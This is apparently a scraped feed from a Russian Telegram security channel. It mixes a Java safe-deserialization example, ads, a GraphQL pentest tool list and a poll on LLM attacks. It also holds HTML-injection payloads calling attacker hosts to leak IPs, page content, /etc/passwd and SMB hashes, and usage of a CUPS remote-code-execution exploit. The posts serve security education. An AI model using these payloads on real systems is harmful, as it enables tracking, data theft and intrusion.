Теперь поговорим о том, как защищаться от десериализации
Пример безопасного кода:
import java.io.*;
import java.net.ServerSocket;
import java.net.Socket;
import java.util.HashSet;
import java.util.Set;
public class SecureServer {
private static final Set<String> ALLOWED_CLASSES = new HashSet<>();
static {
ALLOWED_CLASSES.add("java.lang.String");
ALLOWED_CLASSES.add("java.util.ArrayList");
}
public static void main(String[] args) {
try (ServerSocket serverSocket = new ServerSocket(1234)) {
System.out.println("Сервер запущен. Ожидание подключений...");
while (true) {
try (Socket clientSocket = serverSocket.accept();
ObjectInputStream ois = new ObjectInputStream(clientSocket.getInputStream()) {
@Override
protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
if (!ALLOWED_CLASSES.contains(desc.getName())) {
throw new InvalidClassException("Недопустимый класс", desc.getName());
}
return super.resolveClass(desc);
}
}) {
Object obj = ois.readObject();
System.out.println("Получен объект: " + obj);
} catch (Exception e) {
e.printStackTrace();
}
}
} catch (IOException e) {
e.printStackTrace();
}
}
}
Исправления:
ALLOWED_CLASSES).resolveClass для проверки классов перед десериализацией.Также есть другие практики по защите от десеров. К примеру Java SecurityManager, transient. С другой стороны вы можете закостылить защиту через сторонние библиотеки: SerialKiller, fastjson2, YamlBeans
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥11👍2 1
Forwarded from Хакер — Xakep.RU
OAuth от и до. Ищем цепочки уязвимостей при атаках на авторизацию #статьи #подписчикам
Сегодня разберем мисконфиги OAuth, которые встречаются в дикой природе и хоть сами по себе безобидны, в определенных условиях могут иметь серьезные последствия — вплоть до похека админских аккаунтов. В этой сатье я покажу, как искать такие цепочки уязвимостей.
https://xakep.ru/2024/09/13/oauth-vuln-chains/
Сегодня разберем мисконфиги OAuth, которые встречаются в дикой природе и хоть сами по себе безобидны, в определенных условиях могут иметь серьезные последствия — вплоть до похека админских аккаунтов. В этой сатье я покажу, как искать такие цепочки уязвимостей.
https://xakep.ru/2024/09/13/oauth-vuln-chains/
#ciso
Атаки вирусов-шифровальщиков остаются серьезной угрозой информационной безопасности компаний. От них не застрахованы даже корпорации с многоуровневыми системами защиты, целыми армиями ИБ-специалистов и арсеналами СЗИ.
Если корпоративная сеть подверглась такой атаке, ИБ-службе и CISO лучше поскорее подключить команду реагирования. Однако бизнес и штатные сотрудники службы безопасности могут самостоятельно снизить риск атак программ-вымогателей, дополнительно защитить критичные файлы и облегчить расследование, если избежать инцидента все же не удалось. Как именно? Рассказывает Семен Рогачев, руководитель отдела реагирования на инциденты Бастиона.
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚5 2
Похек
⚡️Разыгрываем 10 книг "Сети глазами хакера" (в бумажном варианте): • В книге рассматриваются вопросы безопасности компьютерных сетей, что делает ее очень полезной для экспертов по сетевой безопасности, пентестерам и даже системным администраторам! • Всего…
🎉 Результаты розыгрыша:
Победители:
1. ooYa9ii (@Russian_OSlNT)
2. ALISHER (@megaumka)
3. Константин (@kr1pt0graf)
4. Babidshon (@BABIDSHON12)
5. Даниил (@by_dnk)
6. Алексей
7. Алексей (@lost_fany)
8. .Morty (@moortyyy)
9. Panteleevich (@Cracka1)
10. Anton (@TichoBrage)
Проверить результаты
Победители:
1. ooYa9ii (@Russian_OSlNT)
2. ALISHER (@megaumka)
3. Константин (@kr1pt0graf)
4. Babidshon (@BABIDSHON12)
5. Даниил (@by_dnk)
6. Алексей
7. Алексей (@lost_fany)
8. .Morty (@moortyyy)
9. Panteleevich (@Cracka1)
10. Anton (@TichoBrage)
Проверить результаты
🔥13👍5😁3
У тебя есть возможность поучаствовать в One Week Offer от крупнейшей технологической компании России - лидера инженерной индустрии.
Если ты хорошо знаешь принципы серверной архитектуры и СХД и хочешь стать частью масштабных проектов:
• Пришли своё резюме и заполни форму участия до 22 сентября.
• Пройди техническое интервью.
• Получи оффер после успешного собеседования.
Скорее переходи по ссылке, оставляй заявку и стань частью команды.
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚11😁3
Forwarded from HaHacking
html5sec.org/test/#<1...149> ]Для каждого из почти 150 приведённых векторов XSS атак существует демо-стенд, где можно отредактировать полезную нагрузку
iframe'ов с различными DTD (HTML5, HTML4, XHTML);html5sec.org/test.<ext> ]Примеры файлов, содержащих полезную нагрузку для вызова
alert(1), со следующими расширениями:asf, avi, class, css, dtd, eml, evt, gif, hlp, hta, htc, html, jar, js, json, mpeg, pdf, sct, svg, swf, vbs, vml, wbxml, xbl, xdr, xml, xsl, xxe, zip
Может быть полезен как памятка для составления полезной нагрузки для эксплуатации возможности внедрения HTML кода: для реализации OOB запросов и эксфильтрации данных;
Или как чеклист для проверки, как там поживает Ваша анонимность, ведь именно по такому принципу работают, например, пиксели-трекеры в электронных письмах
...
<img dynsrc="https://leaking.via/img-dynsrc">
<img lowsrc="https://leaking.via/img-lowsrc">
<video controls><source src="https://leaking.via/video-source-src" type="video/mp4"></video>
<style>@import url(https://leaking.via/css-import-url);</style>
<svg version="1.1" xmlns="http://www.w3.org/2000/svg"><rect cursor="url(https://leaking.via/svg-cursor),auto" /></svg>
<xml src="https://leaking.via/xml-src" id="xml"></xml>
<math xlink:href="https://leaking.via/mathml-math">CLICKME</math>
...
➖ [Chrome] Leak user html content using Dangling Markup injection when http upgrade to https▪️ ЧТО:<img src="http://ATTACKER/?q=▪️ КОГДА:HTTP➡️ HTTPSдляhttp://ATTACKER▪️ ИТОГ: утечка содержимого страницы➖ [Proton] User IP address leaked on email open▪️ ЧТО:<svg><style>circle { background-image: url(https://ATTACKER/200); }</style><circle></circle></svg>▪️ КОГДА: при открытии письма▪️ ИТОГ: утечкаIPадреса➖ [macOS] This man thought opening a txt file is fine, he thought wrong▪️ ЧТО:ℹ️ <!DOCTYPE HTML><html><head></head><body><style>@import{ "file:///net/ATTACKER/a.css"}</style></body></html>ℹ️ <iframedoc src="file:///etc/passwd">▪️ КОГДА: при открытииTXTфайла в TextEdit▪️ ИТОГ: DoS (например, подтянуть/dev/zero), утечкаIPадреса + содержимого локальных файлов (*объединить пейлоады)➖ [MS Outlook] SMB hash hijacking & user tracking▪️ ЧТО:<v:background xmlns_v="urn:schemas-microsoft-com:vml"><br><v:fill src="<strong>its:/ATTACKER/IDontExistNew/foobar</strong>"></v:fill><br></v:background>▪️ КОГДА: при открытии письма▪️ ИТОГ: внешниеSMB/WebDAVзапросы
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍18🔥5 3
Forwarded from Видеоканал Global Digital Space
Без воды, только практика.
Без цензуры, только правда.
Всё, что вы хотели узнать из первых уст.
Мы запускаем серию подкастов
Рынок уязвимостей: как устроен рынок багбаунти в России | Эпизод 1
В первом эпизоде подкаста узнаем, чем сегодня живет «мир багбаунти» в России и исследуем, как эти программы трансформируют рынок кибербезопасности.
Обсудим, как компании используют багбаунти для повышения безопасности, какие ведущие платформы и инициативы существуют в России.
В гостях у Луки Сафонова
(основатель bugbounty.ru)
Андрей Левкин (Руководитель продукта BI.ZONE Bug Bounty) и
Анатолий Иванов (Руководитель платформы Standoff Bug Bounty)
Выбирайте, где смотреть
Полезные ссылки:
Standoff 360
Positive Technologies
BI.ZONE
BI.ZONE Bug Bounty
BugBountyRu
Киберполигон
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥16⚡4👍2😁1🌚1
Forwarded from Standoff 365
Конечно хочешь. Вот короткая инструкция, что делать:
Еще читаешь? Бросай это дело — анкета сама себя не заполнит.
Please open Telegram to view this post
VIEW IN TELEGRAM
😁4 1
Насколько ты знаком с темой защиты ML или ИИ, безопасностью таких систем?
Final Results
15%
Слышал/не слышал, мне это не интересно
36%
Не слышал никогда, но интересно
6%
Слышал/знаю про alignment (приведение моделей к человеческим ценностям и нормам)
33%
Слышал/знаю про атаки через промпты на LLM-инъекции, джейлбрейки, про отравление данных
9%
Уже смешарик: имею практический опыт проведения атак на модели, шарю за MLSecOps-фреймворки
🔥10😁5 2
VK Security Confab
#мероприятие
Ивент для AppSec, DevSecOps, разработчиков и в целом безопасников
🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
#мероприятие
Ивент для AppSec, DevSecOps, разработчиков и в целом безопасников
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥26👍2😁2
WAF-день в КиберДоме
#мероприятие
Открытая дисскусия "Развитие и тенденции WAF в России: будущее рынка"
🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
#мероприятие
Открытая дисскусия "Развитие и тенденции WAF в России: будущее рынка"
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14😁7 3🔥2⚡1
Автоматизированный пентест GraphQL
#graphql #pentest
➡️ GraphQL - это открытая технология для создания и взаимодействия с API. Она была создана в 2012 году как альтернативный подход к REST - архитектурному стилю, определяющему принципы взаимодействия клиента и сервера через HTTP-запросы, стандартизированные URL и форматы данных JSON и XML.
В отличие от REST API, где ответ на запрос приходит в формате JSON и требует дальнейшего анализа для извлечения нужной информации, GraphQL позволяет получить только необходимые данные за один запрос, даже если они распределены по разным источникам. Это делает GraphQL более эффективным и удобным методом извлечения данных по сравнению с REST.
➡️ Основные преимущества GraphQL
▪️ Не нужно создавать несколько REST-запросов. Чтобы извлечь данные, достаточно ввести один запрос.
▪️ Не привязан к конкретной базе данных или механизму хранения.
▪️ Используется целая система типов данных.
Более подробно можете ознакомиться в этом видео или в этой статье.
❤️ А теперь перейдём к самой вкусной части | Пентест GraphQL
Начнём с классики, это Hacktricks . Но это скучно)
Список тулз, которые рекомендуют в интернетах:
➡️ graphw00f - тулза делает аудит на основе GraphQL Threat Matrix Project и после скана она выводит отчёт смапленный по этой матрице уязвимостей.
➡️ InQL - довольно популярное расширение для BurpSuite, которое позволяет просканировать ендпоинты GraphQL, также можете загрузить json схему в него. Этот режим позволит собрать все эндпоинты в одну центролизованную кучку. Затем перекидываете конкретный эндпоинт во вкладку Attacker и там уже можете в ручном режиме изменять запрос.
➡️ Куда же мы без ffuf и хорошего словаря для GraphQL
➡️ GraphQL Cop - данная тулза подходит и для пентестеров, и для appsec/devsecops, т.к. очень легко заворачивается в CI/CD. Есть визуально красивый текстовый вывод в консоль, а есть Json вывод. Тулза обнаруживает атаки типа DOS, Раскрытие информации, CSRF. Но как говорится, где одна бага, там и вторая)
➡️ Graphinder - добывает все graphql эндпоинты для конкретного домена
➡️ GraphQLmap - интересный интерактивный режим. Пример работы
➡️ Auto GraphQL Scanner - бурповское расширение по совету от Bo0om
➡️ Два визуализатора схем GraphQL, GraphQL Voyager и GraphQL Online
➡️ Уже все имплементировали nuclei в свои DAST, поэтому вот шаблон под детект GraphQL
➡️ В случае если интроспекция выключена, используем Clairvoyance. Он соберёт для вас json схему.
⚠️ Типичные уязвимости для GraphQL
➡️ DOS. GraphQL будут подвержены для этого типа атак, если нет ограничений на глубину запросов.
➡️ Сбатченные (batched) запросы и алиасы. К примеру вы установили rate limit на ваши эндпоинты, НО если вы разрешили сбатченные запросы, то хахакер может впихнуть множество запросов в один и тем самым это приведет к DOS или к обходу рейтов.
➡️ Некорректная или отсутствующая аутентификация и авторизация
➡️ XSS
➡️ Arbitrary File Upload & Path Traversal
➡️ RCE
🛠 Лабы для тренировок
➡️ Portswigger - не очень много тасков, нет прям сложных
➡️ DVGA (Damn Vulnerable GraphQL Application) - самая популярная лаба
➡️ vuln-graphql-api - малоизвестная лаба (сам ещё не раскатывал)
📌 Почитать ещё
➡️ Статья от ООО Бастион
➡️ Pentesting GraphQL 101 Part 1 / 2 / 3
➡️ GraphQL Pentesting for Dummies! Part- 1 / 2
➡️ GraphQL Cheat Sheet
➡️ Документация GraphQL
🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
#graphql #pentest
В отличие от REST API, где ответ на запрос приходит в формате JSON и требует дальнейшего анализа для извлечения нужной информации, GraphQL позволяет получить только необходимые данные за один запрос, даже если они распределены по разным источникам. Это делает GraphQL более эффективным и удобным методом извлечения данных по сравнению с REST.
Более подробно можете ознакомиться в этом видео или в этой статье.
Список тулз, которые рекомендуют в интернетах:
Please open Telegram to view this post
VIEW IN TELEGRAM
20🔥26👍10 3
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
#unix #RCE #CVE
CVE-2024-47176 CVE-2024-47076 CVE-2024-47175 CVE-2024-47177
Вчера вечером интернет наводнился новостью о новой баге в UNIX системах, которая позволяет выполнить неавторизованный RCE. Но были особые условия, к примеру что должна быть очередь на печать. В прикрепленном видосе демонстрируется PoC.
Авторы эксплойта изучили коммит в OpenPrinting CUPS, в котором была исправлена бага и написали эксплойт. Он использует dns-sd обнаружение принтера, требуя, чтобы цель могла получить широковещательное сообщение, т.е. находилась в той же сети.
usage: cupshax.py [-h] [--name NAME] --ip IP [--command COMMAND] [--port PORT]
A script for executing commands remotely
options:
-h, --help show this help message and exit
--name NAME The name to use (default: RCE Printer)
--ip IP The IP address of the machine running this script
--command COMMAND The command to execute (default: 'touch /tmp/pwn')
--port PORT The port to connect on (default: 8631)
python cupshax.py --name "Print to PDF (Color)" \
--command "id>/tmp/pwn" \
--ip 10.0.0.3
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍22🔥7⚡2 2
Ставьте плюс в комментах кто уже на underconf.ru и кто приедет ещё
😁6👍2
Forwarded from BugXplorer (j b)
Scan for CVE-2024-47176 (CUPS - Remote Code Execution) with Nuclei
Vulnerability discovery: https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
Nuclei Template: https://cloud.projectdiscovery.io/?template=CVE-2024-47176
Source: https://x.com/pdnuclei/status/1840195177098453308
Vulnerability discovery: https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
Nuclei Template: https://cloud.projectdiscovery.io/?template=CVE-2024-47176
Source: https://x.com/pdnuclei/status/1840195177098453308
🔥14👍3 2⚡1